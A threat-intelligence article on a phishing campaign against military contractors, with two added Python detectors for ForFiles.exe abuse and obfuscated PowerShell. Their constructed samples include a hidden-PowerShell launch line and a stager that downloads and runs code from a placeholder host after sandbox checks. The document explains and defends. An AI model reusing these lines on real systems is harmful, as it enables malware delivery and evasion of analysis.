
Attackers Attempt to Infiltrate U.S. Military Contractors Via Phishing

Researchers have observed an attack campaign targeting numerous military contractors involved in weapon manufacturing. One of them is a supplier of F-35 Lightning II fighter aircraft components.

The attack campaign

Securonix spotted the highly targeted attacks and found that they involved sending phishing emails to employees, leading to a multi-stage infection. The attack also used various persistence and detection-avoidance mechanisms.
  • The attack begins with a phishing email carrying a ZIP attachment that contains a shortcut file. The shortcut connects to the C2 server and executes a chain of PowerShell scripts to infect the system with malware.
  • The shortcut file does not use the commonly abused ‘cmd[.]exe’ or ‘powershell[.]exe’ tools. Instead, it uses the unusual ‘C:\Windows\System32\ForFiles[.]exe’ binary to run commands.
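The ForFiles.exe launcher is the kind of behaviour that process-creation telemetry can surface. The following is an added detection example written for this article, not code from Securonix or from the campaign: it parses constructed process-creation records (simplified key=value lines that borrow Sysmon Event ID 1 field names; none are real telemetry, and the C2 host and script path are placeholders) and flags forfiles.exe launches whose /c payload behaves like a launcher rather than a file job. The heuristics are assumptions of this example: a genuine forfiles job almost always references one of the tool's per-file variables (@file, @path, ...) in its payload, and has no reason to start a script host.

```python
import ntpath
import re
from dataclasses import dataclass

# Constructed sample process-creation events (simplified key=value;key=value
# lines borrowing Sysmon Event ID 1 field names). None of them are real
# campaign telemetry; the C2 host and script path are placeholders.
SAMPLE_LOG = r"""
Image=C:\Windows\System32\ForFiles.exe;ParentImage=C:\Windows\explorer.exe;CommandLine=forfiles /p C:\Windows\System32 /m notepad.exe /c "cmd /c powershell -w hidden -File C:\Users\Public\stage1.ps1"
Image=C:\Windows\System32\forfiles.exe;ParentImage=C:\Windows\System32\cmd.exe;CommandLine=forfiles /p D:\logs /s /m *.log /d -30 /c "cmd /c del @path"
Image=C:\Windows\System32\notepad.exe;ParentImage=C:\Windows\explorer.exe;CommandLine=notepad.exe report.txt
"""

# Script hosts and download utilities that a legitimate file-cleanup job
# has no reason to start from a forfiles payload (assumed list).
INTERPRETERS = ("powershell", "pwsh", "mshta", "wscript", "cscript",
                "rundll32", "regsvr32", "certutil", "bitsadmin")
# Per-file variables forfiles substitutes into the /c payload; real use of
# the tool almost always references at least one of them.
PLACEHOLDER_RE = re.compile(r"@(file|fname|ext|path|relpath|isdir|fsize|fdate|ftime)\b", re.I)
PAYLOAD_RE = re.compile(r'/c\s+(?:"([^"]*)"|(\S+))', re.I)
# forfiles runs this command when /c is omitted.
DEFAULT_PAYLOAD = "cmd /c echo @file"


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def parse_events(log: str) -> list:
    """Parse the constructed key=value;... lines into ProcEvent records."""
    events = []
    for line in log.strip().splitlines():
        fields = dict(part.split("=", 1) for part in line.split(";") if "=" in part)
        events.append(ProcEvent(fields.get("Image", ""),
                                fields.get("ParentImage", ""),
                                fields.get("CommandLine", "")))
    return events


def forfiles_payload(command_line: str) -> str:
    """Extract the /c payload; forfiles falls back to its default when absent."""
    m = PAYLOAD_RE.search(command_line)
    if not m:
        return DEFAULT_PAYLOAD
    return m.group(1) if m.group(1) is not None else m.group(2)


def assess(ev: ProcEvent) -> list:
    """Return sorted reason tags for a forfiles.exe launch; empty for other images."""
    # ntpath handles Windows paths correctly even when this runs on Linux.
    if ntpath.basename(ev.image).lower() != "forfiles.exe":
        return []
    reasons = []
    # A double-clicked shortcut runs under explorer.exe, consistent with the
    # LNK delivery the article describes.
    if ntpath.basename(ev.parent_image).lower() == "explorer.exe":
        reasons.append("launched_from_explorer")
    payload = forfiles_payload(ev.command_line).lower()
    if not PLACEHOLDER_RE.search(payload):
        reasons.append("payload_ignores_matched_file")
    if any(tool in payload for tool in INTERPRETERS):
        reasons.append("payload_spawns_interpreter")
    return sorted(reasons)


def find_suspicious(log: str) -> list:
    """Flag forfiles launches whose payload looks like a launcher, not a file job."""
    hits = []
    for ev in parse_events(log):
        reasons = assess(ev)
        if any(r.startswith("payload_") for r in reasons):
            hits.append({"command_line": ev.command_line, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(hit["reasons"], "<-", hit["command_line"])
```

The second sample event, a log-cleanup job that uses @path, is left alone even though it runs forfiles, and the parent-process tag alone never triggers a hit; the payload checks carry the decision, so the rule stays quiet on ordinary administrative use.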

Moreover, researchers could trace similarities between the ongoing campaign and APT37’s (Konni) previous attack campaigns, but could not link the campaign to any known threat group with confidence.

Obfuscation and avoiding sandboxes

The campaign uses secured C2 infrastructure and multiple layers of obfuscation in its PowerShell stagers.
  • The obfuscation techniques include IEX obfuscation, reordering/symbol obfuscation, raw compression, byte-value obfuscation, backtick obfuscation, and string replacement.
  • Further, to avoid sandboxes, a script scans the running processes for names associated with monitoring/debugging software and checks that the screen height is above 777 pixels and that the system memory is above 4 GB.
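Several of the listed obfuscation layers are reversible by simple text normalization, which is often enough to expose the IEX call and the sandbox checks to a content rule. The following is an added example written for this article, not Securonix's tooling or the campaign's code: it folds backtick insertion, string splitting, format-operator reordering and literal .Replace() calls in a constructed PowerShell fragment, then reports which indicators survive. The sample stager is constructed for the example (the 777-pixel and 4 GB thresholds are taken from the article's description; the URL is a placeholder), and the regexes are heuristics of this example rather than a complete deobfuscator.

```python
import re

# Constructed stager fragment imitating the obfuscation styles the article
# lists (backtick insertion, string splitting, format-operator reordering,
# string replacement feeding IEX) and its sandbox checks. It is not the
# campaign's code; the URL is a placeholder.
SAMPLE_STAGER = r"""
$h = ([System.Windows.Forms.Screen]::PrimaryScreen).Bounds.Height
$m = (Get-WmiObject Win32_ComputerSystem).TotalPhysicalMemory
if ($h -le 777 -or $m -le 4GB) { exit }
foreach ($p in @('wireshark','procmon','x64dbg')) { if (Get-Process -Name $p -ErrorAction SilentlyContinue) { exit } }
$cmd = 'I!X'.Replace('!','E')
&("{1}{0}" -f 'eX','I') (Ne`w-Ob`ject Net.WebClient).Download`String(('https://'+'c2.invalid'+'/stage2'))
"""

# Backticks that do not form a PowerShell escape sequence (`n, `t, `0 ...)
# are inert and can be dropped.
BACKTICK_RE = re.compile(r"""`(?![0abefnrtuv`"'$\n])""")
# 'a'+'b' string splitting.
CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
# "{1}{0}" -f 'x','y' reordering with literal arguments.
FORMAT_RE = re.compile(r"""["']((?:\{\d+\})+)["']\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')""")
# 'lit'.Replace('a','b') on a literal string.
REPLACE_RE = re.compile(r"'([^']*)'\.Replace\('([^']*)'\s*,\s*'([^']*)'\)", re.I)


def _fold_format(m):
    args = re.findall(r"'([^']*)'", m.group(2))
    try:
        return "'" + re.sub(r"\{(\d+)\}", lambda d: args[int(d.group(1))], m.group(1)) + "'"
    except IndexError:  # malformed: leave the text untouched
        return m.group(0)


def normalize(script: str) -> str:
    """Peel the reversible obfuscation layers until nothing more folds."""
    s = BACKTICK_RE.sub("", script)
    prev = None
    while prev != s:
        prev = s
        s = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", s)
        s = FORMAT_RE.sub(_fold_format, s)
        s = REPLACE_RE.sub(lambda m: "'" + m.group(1).replace(m.group(2), m.group(3)) + "'", s)
    return s


INDICATORS = {
    "invoke_expression": re.compile(r"\binvoke-expression\b|\biex\b", re.I),
    "web_download": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b", re.I),
    "screen_height_check": re.compile(r"Screen\b.*?\bHeight\b|Bounds\.Height", re.I),
    "memory_check": re.compile(r"TotalPhysicalMemory|TotalVisibleMemorySize", re.I),
}
# The process check only counts when enumeration and a known analysis tool
# name appear together (assumed tool list).
PROCESS_ENUM_RE = re.compile(r"Get-Process|tasklist|Win32_Process", re.I)
ANALYSIS_TOOL_RE = re.compile(r"\b(wireshark|procmon|procexp|x64dbg|x32dbg|ollydbg|windbg|fiddler|ida64?)\b", re.I)


def analyze_stager(script: str) -> dict:
    """Normalize the script and list the indicators that remain visible."""
    s = normalize(script)
    found = [name for name, rx in INDICATORS.items() if rx.search(s)]
    if PROCESS_ENUM_RE.search(s) and ANALYSIS_TOOL_RE.search(s):
        found.append("analysis_tool_process_check")
    return {"normalized": s, "indicators": sorted(found)}


if __name__ == "__main__":
    result = analyze_stager(SAMPLE_STAGER)
    print(result["normalized"])
    print(result["indicators"])
```

Normalization runs in a loop because the layers nest (a split string may only become a Replace() target after concatenation is folded); the backtick pass keeps genuine escape sequences such as `n intact, and raw compression and byte-value obfuscation are not handled here because they require executing or decoding data rather than rewriting text.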

Used domains

The domains used for the C2 infrastructure were registered in July and hosted on DigitalOcean.
  • Later, the attackers shifted their domains to Cloudflare to take advantage of its CDN and security services, such as geoblocking, IP address masking, and TLS/HTTPS encryption.
  • Some of the C2 domains include terma[.]wiki, terma[.]dev, terma[.]ink, and terma[.]app.

Conclusion

The recent campaign appears to be operated by a sophisticated threat actor who is well-versed in the techniques of staying hidden. Organizations are advised to stay vigilant and aware of the techniques used. Further, it is suggested to adopt a collaborative, threat intelligence sharing-based security posture to stay protected from such threats.
Cyware Publisher